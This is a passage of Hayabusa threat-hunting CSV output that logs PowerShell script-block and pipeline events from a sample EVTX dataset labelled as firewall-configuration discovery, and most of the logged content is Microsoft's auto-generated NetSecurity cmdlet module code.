$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and 
(@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallProfile ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
